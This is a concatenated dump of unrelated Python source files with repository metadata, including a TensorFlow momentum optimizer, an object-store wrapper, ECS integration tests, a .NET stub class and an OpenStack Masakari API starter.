raise KeyError('Invalid connection id')
if self._connection_owners[conn_id] != requester:
raise RuntimeError('Permission denied')
self._domain_administrator.stop_serving_asset(conn_id)
del self._connection_owners[conn_id]
def _check_request(
self, asset_id: Identifier, requester: Identifier) -> None:
"""Check that a request for an asset is allowed.
Args:
asset_id: The asset being requested.
requester: The site requesting access to it.
Raises:
KeyError: If we don't have this asset.
RuntimeError: If the request is not allowed.
"""
if asset_id not in self._assets:
msg = (
f'{self}: Asset {asset_id} not found'
f' (requester = {requester}).')
logger.info(msg)
raise KeyError(msg)
asset = self._assets[asset_id]
if isinstance(asset, DataAsset):
perms = self._permission_calculator.calculate_permissions(
asset.metadata.job)
perm = perms[asset.metadata.item]
if isinstance(asset, ComputeAsset):
perm = self._policy_evaluator.permissions_for_asset(asset_id)
if not self._policy_evaluator.may_access(perm, requester):
raise RuntimeError(f'{self}: Security error, access denied'
f'for {requester} to {asset_id}')
| 36.458128 | 77 | 0.617619 |
4a280de6b716fd3569d0d2290eb06686641fd523 | 279 | py | Python | pirates/ai/HolidayManager.py | ksmit799/POTCO-PS | 520d38935ae8df4b452c733a82c94dddac01e275 | [
"Apache-2.0"
] | 8 | 2017-01-24T04:33:29.000Z | 2020-11-01T08:36:24.000Z | pirates/ai/HolidayManager.py | ksmit799/Pirates-Online-Remake | 520d38935ae8df4b452c733a82c94dddac01e275 | [
"Apache-2.0"
] | 1 | 2017-03-02T18:05:17.000Z | 2017-03-14T06:47:10.000Z | pirates/ai/HolidayManager.py | ksmit799/Pirates-Online-Remake | 520d38935ae8df4b452c733a82c94dddac01e275 | [
"Apache-2.0"
] | 11 | 2017-03-02T18:46:07.000Z | 2020-11-01T08:36:26.000Z | from direct.distributed import DistributedObject
from direct.directnotify import DirectNotifyGlobal
class HolidayManager(DistributedObject.DistributedObject):
notify = DirectNotifyGlobal.directNotify.newCategory('HolidayManager')
neverDisable = 1
def __init__(self):
pass | 31 | 71 | 0.845878 |
4a280e7c514abfa1c148c27212741ff85c839cf5 | 5,621 | py | Python | tensorflow/python/training/momentum.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 52 | 2018-11-12T06:39:35.000Z | 2022-03-08T05:31:27.000Z | tensorflow/python/training/momentum.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 2 | 2018-12-04T08:35:40.000Z | 2020-10-22T16:17:39.000Z | tensorflow/python/training/momentum.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 17 | 2019-03-11T01:17:16.000Z | 2022-02-21T00:44:47.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Momentum for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
from tensorflow.python.training import training_ops
from tensorflow.python.util.tf_export import tf_export
@tf_export("train.MomentumOptimizer")
class MomentumOptimizer(optimizer.Optimizer):
"""Optimizer that implements the Momentum algorithm.
Computes (if `use_nesterov = False`):
```
accumulation = momentum * accumulation + gradient
variable -= learning_rate * accumulation
```
Note that in the dense version of this algorithm, `accumulation` is updated
and applied regardless of a gradient's value, whereas the sparse version (when
the gradient is an `IndexedSlices`, typically because of `tf.gather` or an
embedding) only updates variable slices and corresponding `accumulation` terms
when that part of the variable was used in the forward pass.
"""
def __init__(self, learning_rate, momentum,
use_locking=False, name="Momentum", use_nesterov=False):
"""Construct a new Momentum optimizer.
Args:
learning_rate: A `Tensor` or a floating point value. The learning rate.
momentum: A `Tensor` or a floating point value. The momentum.
use_locking: If `True` use locks for update operations.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "Momentum".
use_nesterov: If `True` use Nesterov Momentum.
See [Sutskever et al., 2013](
http://jmlr.org/proceedings/papers/v28/sutskever13.pdf).
This implementation always computes gradients at the value of the
variable(s) passed to the optimizer. Using Nesterov Momentum makes the
variable(s) track the values called `theta_t + mu*v_t` in the paper.
This implementation is an approximation of the original formula, valid
for high values of momentum. It will compute the "adjusted gradient"
in NAG by assuming that the new gradient will be estimated by the
current average gradient plus the product of momentum and the change
in the average gradient.
@compatibility(eager)
When eager execution is enabled, `learning_rate` and `momentum` can each be
a callable that takes no arguments and returns the actual value to use. This
can be useful for changing these values across different invocations of
optimizer functions.
@end_compatibility
"""
super(MomentumOptimizer, self).__init__(use_locking, name)
self._learning_rate = learning_rate
self._momentum = momentum
self._use_nesterov = use_nesterov
def _create_slots(self, var_list):
for v in var_list:
self._zeros_slot(v, "momentum", self._name)
def _prepare(self):
learning_rate = self._learning_rate
if callable(learning_rate):
learning_rate = learning_rate()
self._learning_rate_tensor = ops.convert_to_tensor(learning_rate,
name="learning_rate")
momentum = self._momentum
if callable(momentum):
momentum = momentum()
self._momentum_tensor = ops.convert_to_tensor(momentum, name="momentum")
def _apply_dense(self, grad, var):
mom = self.get_slot(var, "momentum")
return training_ops.apply_momentum(
var, mom,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad,
math_ops.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_dense(self, grad, var):
mom = self.get_slot(var, "momentum")
return training_ops.resource_apply_momentum(
var.handle, mom.handle,
math_ops.cast(self._learning_rate_tensor, grad.dtype.base_dtype),
grad,
math_ops.cast(self._momentum_tensor, grad.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
def _apply_sparse(self, grad, var):
mom = self.get_slot(var, "momentum")
return training_ops.sparse_apply_momentum(
var, mom,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad.values, grad.indices,
math_ops.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_sparse(self, grad, var, indices):
mom = self.get_slot(var, "momentum")
return training_ops.resource_sparse_apply_momentum(
var.handle, mom.handle,
math_ops.cast(self._learning_rate_tensor, grad.dtype),
grad, indices,
math_ops.cast(self._momentum_tensor, grad.dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
| 41.947761 | 80 | 0.71304 |
4a2810299a52aa3370468a40f5e5e157e6faf395 | 946 | py | Python | test/integration/states/services/test_ecs.py | mattsb42/rhodes | 86d5c86fea1f069ce6f896d2cfea1ed6056392dc | [
"Apache-2.0"
] | 1 | 2019-11-18T07:34:36.000Z | 2019-11-18T07:34:36.000Z | test/integration/states/services/test_ecs.py | mattsb42/rhodes | 86d5c86fea1f069ce6f896d2cfea1ed6056392dc | [
"Apache-2.0"
] | 55 | 2019-10-18T05:32:34.000Z | 2020-01-10T07:54:04.000Z | test/integration/states/services/test_ecs.py | mattsb42/rhodes | 86d5c86fea1f069ce6f896d2cfea1ed6056392dc | [
"Apache-2.0"
] | null | null | null | """Integration tests for ``rhodes.states.services.ecs``."""
import pytest
from rhodes.states.services.ecs import AmazonEcs
from rhodes.structures import Parameters
from ...integration_test_utils import build_and_try_single_step_state_machine
pytestmark = [pytest.mark.integ]
def test_ecs_minimal():
step = AmazonEcs("test", TaskDefinition="bar")
build_and_try_single_step_state_machine(step)
def test_ecs_all_specials():
step = AmazonEcs(
"test",
Cluster="foo",
Group="bar",
LaunchType="baz",
NetworkConfiguration=Parameters(AwsvpcConfiguration=Parameters(AssignPublicIp="wat")),
Overrides=Parameters(ContainerOverrides=[dict(Cpu=3)]),
PlacementConstraints=[dict(Expression="foo", Type="bar")],
PlacementStrategy=[dict(Field="foo", Type="bar")],
PlatformVersion="foo",
TaskDefinition="bar",
)
build_and_try_single_step_state_machine(step)
| 30.516129 | 94 | 0.713531 |
4a28104bfe070c072906d4f65b49dd11bd935de5 | 3,297 | py | Python | Acquire/ObjectStore/_objstore.py | michellab/BioSimSpaceCloud | 456b146a2131565e354352872d3e75a08c3652d1 | [
"Apache-2.0"
] | 2 | 2019-02-15T16:04:19.000Z | 2019-02-19T15:42:27.000Z | Acquire/ObjectStore/_objstore.py | michellab/BioSimSpaceCloud | 456b146a2131565e354352872d3e75a08c3652d1 | [
"Apache-2.0"
] | null | null | null | Acquire/ObjectStore/_objstore.py | michellab/BioSimSpaceCloud | 456b146a2131565e354352872d3e75a08c3652d1 | [
"Apache-2.0"
] | null | null | null |
import io as _io
import datetime as _datetime
import uuid as _uuid
import json as _json
import os as _os
from ._errors import ObjectStoreError
__all__ = ["ObjectStore", "set_object_store_backend",
"use_testing_object_store_backend",
"use_oci_object_store_backend"]
_objstore_backend = None
def use_testing_object_store_backend(backend):
from ._testing_objstore import Testing_ObjectStore as _Testing_ObjectStore
set_object_store_backend(_Testing_ObjectStore)
return "%s/testing_objstore" % backend
def use_oci_object_store_backend():
from ._oci_objstore import OCI_ObjectStore as _OCI_ObjectStore
set_object_store_backend(_OCI_ObjectStore)
class ObjectStore:
@staticmethod
def get_object_as_file(bucket, key, filename):
return _objstore_backend.get_object_as_file(bucket, key, filename)
@staticmethod
def get_object(bucket, key):
return _objstore_backend.get_object(bucket, key)
@staticmethod
def get_string_object(bucket, key):
return _objstore_backend.get_string_object(bucket, key)
@staticmethod
def get_object_from_json(bucket, key):
return _objstore_backend.get_object_from_json(bucket, key)
@staticmethod
def get_all_object_names(bucket, prefix=None):
return _objstore_backend.get_all_object_names(bucket, prefix)
@staticmethod
def get_all_objects(bucket, prefix=None):
return _objstore_backend.get_all_objects(bucket, prefix)
@staticmethod
def get_all_strings(bucket, prefix=None):
return _objstore_backend.get_all_strings(bucket, prefix)
@staticmethod
def set_object(bucket, key, data):
_objstore_backend.set_object(bucket, key, data)
@staticmethod
def set_object_from_file(bucket, key, filename):
_objstore_backend.set_object_from_file(bucket, key, filename)
@staticmethod
def set_string_object(bucket, key, string_data):
_objstore_backend.set_string_object(bucket, key, string_data)
@staticmethod
def set_object_from_json(bucket, key, data):
_objstore_backend.set_object_from_json(bucket, key, data)
@staticmethod
def log(bucket, message, prefix="log"):
_objstore_backend.log(bucket, message, prefix)
@staticmethod
def delete_all_objects(bucket, prefix=None):
_objstore_backend.delete_all_objects(bucket, prefix)
@staticmethod
def get_log(bucket, log="log"):
_objstore_backend.get_log(bucket, log)
@staticmethod
def clear_log(bucket, log="log"):
_objstore_backend.clear_log(bucket, log)
@staticmethod
def delete_object(bucket, key):
_objstore_backend.delete_object(bucket, key)
@staticmethod
def clear_all_except(bucket, keys):
_objstore_backend.clear_all_except(bucket, keys)
def set_object_store_backend(backend):
"""Set the backend that is used to actually connect to
the object store. This can only be set once in the program!
"""
global _objstore_backend
if backend == _objstore_backend:
return
if _objstore_backend is not None:
raise ObjectStoreError("You cannot change the object store "
"backend once it has been already set!")
_objstore_backend = backend
| 29.4375 | 78 | 0.729754 |
4a281063542312f7977712aaf6024b70832e60d0 | 1,398 | py | Python | stubs.min/System/Windows/Forms/__init___parts/UICuesEventArgs.py | denfromufa/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2017-07-07T11:15:45.000Z | 2017-07-07T11:15:45.000Z | stubs.min/System/Windows/Forms/__init___parts/UICuesEventArgs.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Forms/__init___parts/UICuesEventArgs.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class UICuesEventArgs(EventArgs):
"""
Provides data for the System.Windows.Forms.Control.ChangeUICues event.
UICuesEventArgs(uicues: UICues)
"""
@staticmethod
def __new__(self,uicues):
""" __new__(cls: type,uicues: UICues) """
pass
Changed=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the bitwise combination of the System.Windows.Forms.UICues values.
Get: Changed(self: UICuesEventArgs) -> UICues
"""
ChangeFocus=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the state of the focus cues has changed.
Get: ChangeFocus(self: UICuesEventArgs) -> bool
"""
ChangeKeyboard=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the state of the keyboard cues has changed.
Get: ChangeKeyboard(self: UICuesEventArgs) -> bool
"""
ShowFocus=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether focus rectangles are shown after the change.
Get: ShowFocus(self: UICuesEventArgs) -> bool
"""
ShowKeyboard=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether keyboard cues are underlined after the change.
Get: ShowKeyboard(self: UICuesEventArgs) -> bool
"""
| 29.744681 | 86 | 0.709585 |
4a281132d92b229850ecfd1acf3883022a49f240 | 1,643 | py | Python | masakari/cmd/api.py | sampathP/openstack-masakari | 108d988165271b7bafd66d985ff1000537ef3183 | [
"Apache-2.0"
] | null | null | null | masakari/cmd/api.py | sampathP/openstack-masakari | 108d988165271b7bafd66d985ff1000537ef3183 | [
"Apache-2.0"
] | null | null | null | masakari/cmd/api.py | sampathP/openstack-masakari | 108d988165271b7bafd66d985ff1000537ef3183 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starter script for Masakari API.
"""
import sys
from oslo_log import log as logging
import six
import masakari.conf
from masakari import config
from masakari import exception
from masakari.i18n import _LE
from masakari.i18n import _LW
from masakari import service
CONF = masakari.conf.CONF
def main():
config.parse_args(sys.argv)
logging.setup(CONF, "masakari")
log = logging.getLogger(__name__)
launcher = service.process_launcher()
started = 0
try:
server = service.WSGIService("masakari_api", use_ssl=CONF.use_ssl)
launcher.launch_service(server, workers=server.workers or 1)
started += 1
except exception.PasteAppNotFound as ex:
log.warning(
_LW("%s. ``enabled_apis`` includes bad values. "
"Fix to remove this warning."), six.text_type(ex))
if started == 0:
log.error(_LE('No APIs were started. '
'Check the enabled_apis config option.'))
sys.exit(1)
launcher.wait()
| 28.327586 | 77 | 0.688984 |
Subsets and Splits